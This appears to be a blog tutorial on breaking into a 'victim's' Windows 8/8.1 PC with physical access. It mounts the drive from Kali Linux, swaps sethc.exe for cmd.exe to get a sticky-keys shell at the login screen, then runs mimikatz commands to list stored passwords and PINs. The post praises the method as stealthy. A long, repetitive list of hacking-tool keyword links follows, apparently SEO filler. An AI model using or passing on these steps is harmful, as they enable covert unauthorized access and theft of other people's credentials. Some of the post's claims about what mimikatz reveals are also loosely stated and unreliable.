Total Pageviews

Sunday 28 January 2024

Cracking Windows 8/8.1 Passwords With Mimikatz



You Might have read my previous posts about how to remove windows passwords using chntpw and might be thinking why am I writing another tutorial to do the same thing! Well today we are not going to remove the windows user password rather we are going to be more stealth in that we are not going to remove it rather we are going to know what is the users password and access his/her account with his/her own password. Sounds nice...


Requirements:


  1. A live bootable linux OS (I'm using Kali Linux)(Download Kali Linux)
  2. Mimikatz (Download | Blog)
  3. Physical Access to victim's machine
  4. A Working Brain in that Big Head (Download Here)



Steps:

1. First of all download mimikatz and put it in a pendrive.

2. Boat the victim's PC with your live bootable Pendrive (Kali Linux on pendrive in my case). And open a terminal window

3. Mount the Volume/Drive on which windows 8/8.1 is installed by typing these commands
in the terminal window:

mkdir /media/win
ntfs-3g /dev/sda1 /media/win

[NOTE] ntfs-3g is used to mount an NTFS drive in Read/Write mode otherwise you might not be able to write on the drive. Also /dev/sda1 is the name of the drive on which Windows OS is installed, to list your drives you can use lsblk -l or fdisk -l. The third flag is the location where the drive will be mounted.

4. Now navigate to the System32 folder using the following command

cd /media/win/Windows/System32

5. After navigating to the System32 rename the sethc.exe file to sethc.exe.bak by typing the following command:

mv sethc.exe sethc.exe.bak

sethc.exe is a windows program which runs automatically after shift-key is pressed more than 5 times continuously.

6. Now copy the cmd.exe program to sethc.exe replacing the original sethc.exe program using this command:

cp cmd.exe sethc.exe

[Note] We made a backup of sethc.exe program so that we can restore the original sethc.exe functionality

7. With this, we are done with the hard part of the hack now lets reboot the system and boot our Victim's Windows 8/8.1 OS.

8. After reaching the Windows Login Screen plugin the usb device with mimikatz on it and hit shift-key continuously five or more times. It will bring up a command prompt like this





9. Now navigate to your usb drive in my case its drive G:




10. Now navigate to the proper version of mimikatz binary folder (Win32 for32bit windows and x64 for 64 bit windows)


11. Run mimikatz and type the following commands one after the other in sequence:

privilege::debug
token::elevate
vault::list

the first command enables debug mode
the second one elevates the privilages
the last one lists the passwords which include picture password and pin (if set by the user)









That's it you got the password and everything else needed to log into the system. No more breaking and mess making its simple its easy and best of all its not Noisy lol...

Hope you enjoyed the tutorial have fun :)

Continue reading


  1. Nsa Hack Tools Download
  2. Hacker Tools Linux
  3. Hack Rom Tools
  4. Hacker Tools Apk
  5. Pentest Tools Windows
  6. New Hacker Tools
  7. Hack Tools
  8. Android Hack Tools Github
  9. Hacking Tools Online
  10. Hack Tools Github
  11. Hacker Tools Free
  12. Pentest Tools For Ubuntu
  13. Hacking Tools
  14. Hack Tools Mac
  15. Pentest Tools Open Source
  16. Hack Website Online Tool
  17. Hacking Tools Kit
  18. Android Hack Tools Github
  19. Hacking Tools For Windows
  20. Hacker Tools For Windows
  21. Black Hat Hacker Tools
  22. Pentest Tools Port Scanner
  23. Nsa Hack Tools Download
  24. Pentest Tools Open Source
  25. Hacker Tools List
  26. Pentest Tools Tcp Port Scanner
  27. Hacking Tools For Windows Free Download
  28. Hacking Tools For Windows
  29. Hack Tool Apk
  30. Bluetooth Hacking Tools Kali
  31. Hack And Tools
  32. Growth Hacker Tools
  33. Pentest Tools Review
  34. Hack Apps
  35. Ethical Hacker Tools
  36. How To Install Pentest Tools In Ubuntu
  37. Hacking Tools 2019
  38. Pentest Tools Nmap
  39. Hacking Tools Kit
  40. How To Hack
  41. Hack Tool Apk No Root
  42. Pentest Tools Review
  43. Hacking Tools Mac
  44. Hacking App
  45. Pentest Tools For Android
  46. Pentest Tools Download
  47. Pentest Tools Nmap
  48. Hacking Tools
  49. Pentest Recon Tools
  50. Hacks And Tools
  51. Pentest Tools Windows
  52. Hacker Tools Apk
  53. Hacking Tools For Windows
  54. Pentest Reporting Tools
  55. Hacking Tools For Pc
  56. Pentest Reporting Tools
  57. Best Hacking Tools 2020
  58. Hack Tools For Games
  59. Hacker Tools
  60. Hacker Tools Mac
  61. Pentest Tools Apk
  62. Hacking Tools For Beginners
  63. Hacker Tools For Windows
  64. Tools For Hacker
  65. Beginner Hacker Tools
  66. Hack Tools Pc
  67. Install Pentest Tools Ubuntu
  68. Hack Tools Github
  69. Pentest Tools Tcp Port Scanner
  70. Best Hacking Tools 2020
  71. Hack Tools For Games
  72. Hacking Tools For Windows 7
  73. Hacking Tools Github
  74. Tools 4 Hack
  75. Hacking Tools 2019
  76. Android Hack Tools Github
  77. Hack Tools Online
  78. Hacker Tools For Ios
  79. Hacker Tools Apk Download
  80. Hack Tools Github
  81. Pentest Tools Kali Linux
  82. Pentest Tools For Mac
  83. Hacker Tools For Pc
  84. Pentest Tools Tcp Port Scanner
  85. Hacker Tools Mac
  86. Hack Tools Github
  87. Pentest Box Tools Download
  88. Hacker Tools For Ios
  89. Hacker Security Tools
  90. Pentest Tools Windows
  91. Pentest Tools For Mac
  92. Hacking Tools Online
  93. Ethical Hacker Tools
  94. Install Pentest Tools Ubuntu
  95. Computer Hacker
  96. Hacking Tools For Games
  97. Hacker Tools Free
  98. Pentest Recon Tools
  99. Hack Rom Tools
  100. Pentest Tools Website
  101. Hacking Tools For Mac
  102. Hacker Tools Free
  103. Hacks And Tools
  104. Hacker Hardware Tools
  105. How To Install Pentest Tools In Ubuntu
  106. Pentest Tools Website Vulnerability
  107. Hacker Security Tools
  108. Hackrf Tools
  109. Hack Apps
  110. Pentest Tools Website Vulnerability
  111. Hackers Toolbox
  112. Pentest Tools For Ubuntu
  113. Pentest Tools Open Source
  114. Ethical Hacker Tools
  115. Hackrf Tools
  116. Hacking Tools Hardware
  117. Tools For Hacker
  118. Pentest Tools Online
  119. Pentest Automation Tools
  120. Hacking Apps
  121. Hacking Tools Online
  122. Pentest Tools Url Fuzzer
  123. Pentest Tools Windows
  124. Hacker Search Tools
  125. Hacking Tools Github
  126. Hack Tools For Mac
  127. Pentest Recon Tools
  128. Hack Rom Tools
  129. Growth Hacker Tools
  130. Pentest Reporting Tools
  131. Pentest Tools For Android
  132. Hack Tools For Ubuntu
  133. Growth Hacker Tools
  134. Hack Tools For Pc
  135. Pentest Recon Tools
  136. Hacker Tools Hardware
  137. Pentest Tools
  138. Underground Hacker Sites
  139. Top Pentest Tools
  140. Pentest Tools Tcp Port Scanner
  141. Hacking Tools And Software
  142. Hacking Tools Software
  143. Hack Tools For Ubuntu
  144. Hacker Tools Mac
  145. Hacking Tools For Kali Linux
  146. Hacker Tools Windows
  147. Hacking Tools For Beginners
  148. Nsa Hack Tools Download
  149. Hacker Tools List
  150. Pentest Tools For Windows
  151. Hacking Tools Windows
  152. Hacking Apps
  153. Android Hack Tools Github
  154. Hacking App
  155. Hack Tools
  156. Hacker Tools Windows
  157. Hacker Tools Apk Download
  158. Hacker Tools Linux
  159. Top Pentest Tools
  160. Hacking Tools Software
  161. Hack Tools For Ubuntu
  162. Hacking Tools For Kali Linux
  163. Hackrf Tools
  164. Pentest Tools Kali Linux
  165. Nsa Hacker Tools
  166. Hack Tools Mac
  167. Hackers Toolbox
  168. Black Hat Hacker Tools
  169. Pentest Box Tools Download
  170. Pentest Tools Github
  171. Nsa Hacker Tools
  172. Hack Tools For Pc
  173. Hacking Tools Github
  174. Pentest Tools Free

No comments:

Post a Comment